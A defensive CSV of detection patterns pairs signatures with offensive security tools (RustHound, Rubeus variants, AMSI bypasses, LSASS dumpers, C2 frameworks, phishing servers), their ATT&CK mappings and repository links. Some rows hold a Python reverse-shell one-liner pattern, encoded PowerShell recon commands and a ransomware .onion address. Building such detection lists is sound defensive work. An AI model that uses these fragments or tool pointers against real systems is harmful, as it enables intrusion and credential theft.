"*rusthound *--ldapfqdn *",".{0,1000}rusthound\s.{0,1000}\-\-ldapfqdn\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57776"
"*rusthound *-ldaps *",".{0,1000}rusthound\s.{0,1000}\-ldaps\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57777"
"*rusthound -c *",".{0,1000}rusthound\s\-c\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57778"
"*rusthound -d *",".{0,1000}rusthound\s\-d\s.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57779"
"*rusthound rusthound linux*",".{0,1000}rusthound\srusthound\slinux.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","#linux","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57780"
"*rusthound rusthound windows*",".{0,1000}rusthound\srusthound\swindows.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57781"
"*rusthound* --adcs --dc-only*",".{0,1000}rusthound.{0,1000}\s\-\-adcs\s\-\-dc\-only.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57782"
"*rusthound.exe*",".{0,1000}rusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57783"
"*RustHound-main*",".{0,1000}RustHound\-main.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","57784"
"*RustPotato.exe*",".{0,1000}RustPotato\.exe.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","1","N/A","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","57785"
"*rvazarkar/GMSAPasswordReader*",".{0,1000}rvazarkar\/GMSAPasswordReader.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","N/A","7","3","219","34","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z","57790"
"*RVLextu9ni633iqW54ktzkU4kTDgekRFY8ao9gSwM78=*",".{0,1000}RVLextu9ni633iqW54ktzkU4kTDgekRFY8ao9gSwM78\=.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","#base64","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","57791"
"*Rvn0xsy/Cooolis-ms*",".{0,1000}Rvn0xsy\/Cooolis\-ms.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","57792"
"*rvrsh3ll/BOF_Collection*",".{0,1000}rvrsh3ll\/BOF_Collection.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","57793"
"*rvrsh3ll/Rubeus-Rundll32*",".{0,1000}rvrsh3ll\/Rubeus\-Rundll32.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","1","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","57794"
"*rvrsh3ll/SharpCOM*",".{0,1000}rvrsh3ll\/SharpCOM.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","1","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","57795"
"*rvrsh3ll/SharpEdge*",".{0,1000}rvrsh3ll\/SharpEdge.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","1","N/A","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","57796"
"*rvrsh3ll/SharpSSDP*",".{0,1000}rvrsh3ll\/SharpSSDP.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","1","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","57797"
"*rvrsh3ll/TokenTactics*",".{0,1000}rvrsh3ll\/TokenTactics.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","57798"
"*RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA*",".{0,1000}RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","57799"
"*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A*",".{0,1000}RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","57800"
"*rwxfinder.*",".{0,1000}rwxfinder\..{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","N/A","5","2","101","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z","57801"
"*RWXfinder-main*",".{0,1000}RWXfinder\-main.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","N/A","5","2","101","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z","57802"
"*RXh0ZXJuYWwgQzIgUG9ydA==*",".{0,1000}RXh0ZXJuYWwgQzIgUG9ydA\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","57803"
"*rxwx/cs-rdll-ipc-example*",".{0,1000}rxwx\/cs\-rdll\-ipc\-example.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","57804"
"*ryhanson/phishery*",".{0,1000}ryhanson\/phishery.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","57805"
"*RythmStick/AMSITrigger*",".{0,1000}RythmStick\/AMSITrigger.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","57806"
"*rzte/pdf-exploit*",".{0,1000}rzte\/pdf\-exploit.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4367 poc exploitation","T1566","TA0042","N/A","N/A","Resource Development","https://github.com/rzte/pdf-exploit","1","1","N/A","N/A","6","3","216","41","2024-07-19T03:04:41Z","2024-07-11T14:33:11Z","57807"
"*'S', 'T', 'A', 'R', 'D', 'U', 'S', 'T', '-', 'E', 'N', 'D'*",".{0,1000}\'S\',\s\'T\',\s\'A\',\s\'R\',\s\'D\',\s\'U\',\s\'S\',\s\'T\',\s\'\-\',\s\'E\',\s\'N\',\s\'D\'.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","57808"
"*'S','e','D','e','b','u','g','P','r','i','v','i','l','e','g','e'*",".{0,1000}\'S\',\'e\',\'D\',\'e\',\'b\',\'u\',\'g\',\'P\',\'r\',\'i\',\'v\',\'i\',\'l\',\'e\',\'g\',\'e\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","57809"
"*'S','e','l','f','R','e','f','l','e','c','t','i','v','e'*",".{0,1000}\'S\',\'e\',\'l\',\'f\',\'R\',\'e\',\'f\',\'l\',\'e\',\'c\',\'t\',\'i\',\'v\',\'e\'.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","57810"
"*s.gServer.connectedClients*",".{0,1000}s\.gServer\.connectedClients.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","57811"
"*s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(*os.dup2(s.fileno*pty.spawn(""/bin/bash*",".{0,1000}s\=socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\)\;s\.connect\(.{0,1000}os\.dup2\(s\.fileno.{0,1000}pty\.spawn\(\""\/bin\/bash.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","57814"
"*s0md3v*Striker*",".{0,1000}s0md3v.{0,1000}Striker.{0,1000}","offensive_tool_keyword","Striker","Recon & Vulnerability Scanning Suite for web services","T1210.001 - T1190 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Vulnerability Scanner","https://github.com/s0md3v/Striker","1","1","N/A","N/A","N/A","10","2271","451","2023-06-04T20:15:11Z","2017-10-30T07:08:02Z","57815"
"*S12cybersecurity/Admin2Sys*",".{0,1000}S12cybersecurity\/Admin2Sys.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","N/A","10","1","54","19","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z","57816"
"*S12cybersecurity/RDPCredentialStealer*",".{0,1000}S12cybersecurity\/RDPCredentialStealer.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","57817"
"*S1ckB0y1337/TokenPlayer*",".{0,1000}S1ckB0y1337\/TokenPlayer.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","57818"
"*S1lkys/SharpKiller*",".{0,1000}S1lkys\/SharpKiller.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","57819"
"*S2l3aUFuZENNRA==*",".{0,1000}S2l3aUFuZENNRA\=\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57820"
"*S2l3aUFuZENNRA==*",".{0,1000}S2l3aUFuZENNRA\=\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57821"
"*s2wk77h653qn54csf4gp52orhem4y72dgxsquxulf255pcymazeepbyd.onion*",".{0,1000}s2wk77h653qn54csf4gp52orhem4y72dgxsquxulf255pcymazeepbyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57822"
"*S3cretP4ssw0rd!*",".{0,1000}S3cretP4ssw0rd!.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","57823"
"*S3cur3Th1sSh1t/Amsi-Bypass-Powershell*",".{0,1000}S3cur3Th1sSh1t\/Amsi\-Bypass\-Powershell.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","57824"
"*S3cur3Th1sSh1t/MultiPotato*",".{0,1000}S3cur3Th1sSh1t\/MultiPotato.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","57825"
"*S3cur3Th1sSh1t/PowerSharpPack*",".{0,1000}S3cur3Th1sSh1t\/PowerSharpPack.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","57826"
"*S3cur3Th1sSh1t/SharpOxidResolver*",".{0,1000}S3cur3Th1sSh1t\/SharpOxidResolver.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","1","N/A","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","57827"
